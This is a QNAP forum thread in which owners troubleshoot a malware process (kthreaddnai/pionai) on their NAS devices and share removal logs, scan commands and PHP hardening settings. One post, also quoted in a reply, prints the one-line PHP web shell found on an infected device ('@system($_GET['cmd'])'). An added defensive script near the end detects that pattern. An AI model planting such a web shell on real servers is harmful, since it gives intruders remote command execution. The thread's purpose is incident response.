Unknown Thread kthreaddnai

kameha
Starting out
Posts: 11
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha »

Both Gitea and Nextcloud are exposed through ContainerStation
versieck
First post
Posts: 1
Joined: Fri Sep 28, 2018 3:01 pm

Re: Unknown Thread kthreaddnai

Post by versieck »

I encountered the same problem a few days ago.
I have no idea where this process originates from or what it does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.


App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.

After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan my system every day at 03:00 AM to keep it clean.
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.
OneCD
Guru
Posts: 12039
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Unknown Thread kthreaddnai

Post by OneCD »

KV17uwe wrote: Thu Nov 15, 2018 12:32 pm After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

OneCD wrote: Thu Nov 15, 2018 1:18 pm
KV17uwe wrote: Thu Nov 15, 2018 12:32 pm After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?
yes.
cufiler
First post
Posts: 1
Joined: Tue Jun 05, 2012 3:10 pm

Re: Unknown Thread kthreaddnai

Post by cufiler »

I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to the find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

cufiler wrote: Thu Nov 15, 2018 6:13 pm I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to the find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
What are these settings?

I have already deleted the folder pionai under /tmp/. Also, I closed port 80. I have not yet made the settings in the INI data.
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

Image

the services back there :(
mneiger
New here
Posts: 6
Joined: Thu May 05, 2016 2:57 am

Re: Unknown Thread kthreaddnai

Post by mneiger »

I have the same critter in my TS-251.
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php

good luck
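
An added example, not part of any post in this thread: shell helpers for the two checks described above, cufiler's search for uploaded PHP files that pass request parameters to a command function and mneiger's hunt for files of exactly 37472 bytes. The function names and the pattern list are assumptions made for illustration, and the sample tree is constructed.

```shell
#!/bin/sh
# Added example: triage helpers for the two indicators reported in this thread.
# Function names are hypothetical; run on the NAS over SSH or on a mounted copy.

# List PHP files in which a command-execution function is called directly on
# request data, the shape of the uploaded file quoted above:
#   <?php @system($_GET['cmd']);?>
# "exec" also matches shell_exec( and curl_exec( as a suffix.
find_request_exec_php() {
    webroot=$1
    find "$webroot" -type f -name '*.php' -exec grep -l -E \
        '(system|exec|passthru|popen|proc_open)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' \
        {} \; 2>/dev/null | sort
}

# List regular files of an exact byte size (37472 is the size reported above).
find_files_of_size() {
    dir=$1
    bytes=$2
    find "$dir" -xdev -type f -size "${bytes}c" 2>/dev/null | sort
}

# Build a constructed sample tree (not real NAS data) to try the helpers offline.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/Web/img" "$d/tmp"
    printf '%s\n' "CMD2018<br><pre><?php @system(\$_GET['cmd']);?></pre>" \
        > "$d/Web/img/images.php"
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/Web/index.php"
    dd if=/dev/zero of="$d/tmp/init" bs=37472 count=1 2>/dev/null
    dd if=/dev/zero of="$d/tmp/other" bs=1000 count=1 2>/dev/null
    echo "$d"
}

# With arguments: scan a real web root and directory, e.g.
#   sh triage.sh /share/Web /tmp
if [ -n "${1:-}" ]; then
    find_request_exec_php "$1"
    find_files_of_size "${2:-/tmp}" 37472
fi
```

The pattern only catches the direct form seen in this thread; an obfuscated or encoded script will not match, so an empty result does not show the web root is clean.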
Trexx
Ask me anything
Posts: 5393
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Unknown Thread kthreaddnai

Post by Trexx »

You might try using the new malware remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run real-time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full featured IPS/IDS platform / reverse proxies/etc. can help mitigate risk as well.
Paul

Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350

Model: TVS-673 32GB & TS-228a Offline
dolbyman
Guru
Posts: 35024
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Unknown Thread kthreaddnai

Post by dolbyman »

and all please open tickets with qnap so they can investigate+improve malware removal
kameha
Starting out
Posts: 11
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha »

Hello !

I completely reinstalled my NAS in the last few days (data backup + full disk format on another PC).
All was OK until I reinstalled CodexPack and PhotoStation yesterday, so I suspect it's coming from one of them.

Still investigating...
KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe »

Closing port 80 has temporarily brought peace. QNAP still has not processed my ticket.
maestro72x
Getting the hang of things
Posts: 62
Joined: Thu Jun 03, 2010 5:16 am

Re: Unknown Thread kthreaddnai

Post by maestro72x »

Any luck getting rid of it? I'm having the same issues.
Elbows
Starting out
Posts: 31
Joined: Thu May 07, 2009 9:58 pm

Re: Unknown Thread kthreaddnai

Post by Elbows »

I had the 'pionai' process running and raised a helpdesk ticket.

I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152

It worked for me :-)
QNAP TVS1282 (PRD box)
V4.5.1.1540
8x Seagate 8TB Ironwolf (2x RAID 5 Storage Pools)
4x 1TB Crucial SSD (2x RAID1 Storage Pools)
2x 500GB Samsung PCIe RAID 0 R/W Cache

QNAP TS670 Pro (DEV/Backup box)
V4.3.7.(latest) EOL
6x Seagate 8TB Ironwolf RAID 5

Riello VSD 1500 UPS